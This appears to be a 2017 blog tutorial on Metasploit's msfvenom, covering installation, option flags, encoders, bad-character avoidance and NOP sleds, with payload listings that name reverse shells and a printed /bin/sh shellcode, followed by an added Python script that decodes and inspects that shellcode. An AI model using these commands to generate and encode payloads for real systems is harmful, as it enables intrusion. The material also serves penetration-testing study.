metasploit: generating shellcode

0x00 Installing metasploit

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
$ chmod 755 msfinstall
$ ./msfinstall

0x01 Options overview

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

1. -p selects what the payload does

  --payload: selects the payload type

  --payload-options: lists the sub-options of the selected payload type

Example:
msfvenom -p linux/x86/exec CMD=/bin/sh    # executes a shell

2. -a specifies the processor architecture and the platform

--arch: specifies the processor architecture
--platform: specifies the platform
Example:
msfvenom -a x86 --platform linux

3. -f specifies the output format

Example:
msfvenom -a x86 --platform linux -f python    # the payload is output in Python-language format

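4. -b specifies the characters to avoid (written as the hexadecimal value of each character)

Example:
msfvenom -a x86 --platform linux -b "\x00\x0a"    # '\x00' and '\x0a' must not appear in the generated payload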

5. -e specifies the encoder

Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -e x86/alpha_mixed

6. -n prepends a NOP sled to the payload

--nopsled: prepends the NOP sled
 <length>: specifies the NOP sled length (the option's only argument, per the help text above)
Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -n 120

7. -l lists the payload types, encoder types and NOP types available in msf

msfvenom -l

Framework Payloads (486 total)
==============================

Name                                Description
----                                -----------
aix/ppc/shell_bind_tcp              Listen for a connection and spawn a command shell
aix/ppc/shell_find_port             Spawn a shell on an established connection
aix/ppc/shell_interact              Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp           Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http    Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https   Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp     Run a meterpreter server in Android. Connect back stager

......

Framework Encoders
==================

Name                     Rank        Description
----                     ----        -----------
cmd/echo                 good        Echo Command Encoder
cmd/generic_sh           manual      Generic Shell Variable Substitution Command Encoder
cmd/ifs                  low         Generic ${IFS} Substitution Command Encoder
cmd/perl                 normal      Perl Command Encoder
cmd/powershell_base64    excellent   Powershell Base64 Command Encoder
cmd/printf_php_mq        manual      printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar            manual      The EICAR Encoder
generic/none             normal      The "none" Encoder
mipsbe/byte_xori         normal      Byte XORi Encoder

......

Framework NOPs (9 total)
========================

Name               Description
----               -----------
armle/simple       Simple NOP generator
mipsbe/better      Better NOP generator
php/generic        Generates harmless padding for PHP scripts
ppc/simple         Simple NOP generator
sparc/random       SPARC NOP generator
tty/generic        Generates harmless padding for TTY input
x64/simple         An x64 single/multi byte NOP instruction generator.
x86/opty2          Opty2 multi-byte NOP generator
x86/single_byte    Single-byte NOP generator

8. -v specifies the payload's variable name

By default the payload variable is named buf:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -f python

  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 192 bytes
  buf = ""
  buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
  buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
  buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"

Example:
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -v payload -f python

  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 222 bytes
  payload = ""
  payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
  payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
  payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
  payload += "\xcd\x80"
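
An added example, not part of the original post: it parses the two `-f python` outputs shown in section 8 back into bytes, checks the reported 38-byte size, locates the bytes that the -b "\x00\x0a" list from section 4 would exclude, and pulls out printable strings for triage. The function names are hypothetical.

```python
import re

# msfvenom "-f python" output copied from section 8 of this page
# (default variable name first, then the -v payload run).
OUT_BUF = r'''
buf = ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"
'''
OUT_PAYLOAD = r'''
payload = ""
payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
payload += "\xcd\x80"
'''

def parse_payload(text, var="buf"):
    """Rebuild the bytes from `var = "..."` / `var += "..."` lines without exec()."""
    line_re = re.compile(r'^\s*%s\s*\+?=\s*b?"(.*)"\s*$' % re.escape(var))
    data = bytearray()
    for line in text.splitlines():
        m = line_re.match(line)
        if m:
            data += bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', m.group(1)))
    return bytes(data)

def bad_char_offsets(payload, bad=b"\x00\x0a"):
    """Offsets and values of bytes that appear in a -b style avoid list."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

def printable_strings(payload, min_len=2):
    """ASCII runs of at least min_len bytes, as a strings(1)-style triage aid."""
    return [s.decode("ascii") for s in re.findall(rb'[\x20-\x7e]{%d,}' % min_len, payload)]

if __name__ == "__main__":
    raw = parse_payload(OUT_BUF)
    print("size:", len(raw))
    print("same bytes with -v payload:", raw == parse_payload(OUT_PAYLOAD, "payload"))
    for off, val in bad_char_offsets(raw):
        print("bad char 0x%02x at offset %d" % (val, off))
    print("strings:", printable_strings(raw))
```

The five null bytes it reports in the raw payload are the kind of byte a -b list exists to exclude, and the two outputs decode to identical bytes because -v only changes the variable name.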

9. I have not looked into the other options in depth

0x02 References

Shellcode generator: msfvenom

Generating your own Alphanumeric/Printable shellcode

A tool is only ever a tool; you still have to be able to write it yourself. Fighting!!

posted @ 2017-06-08 17:13  五千年木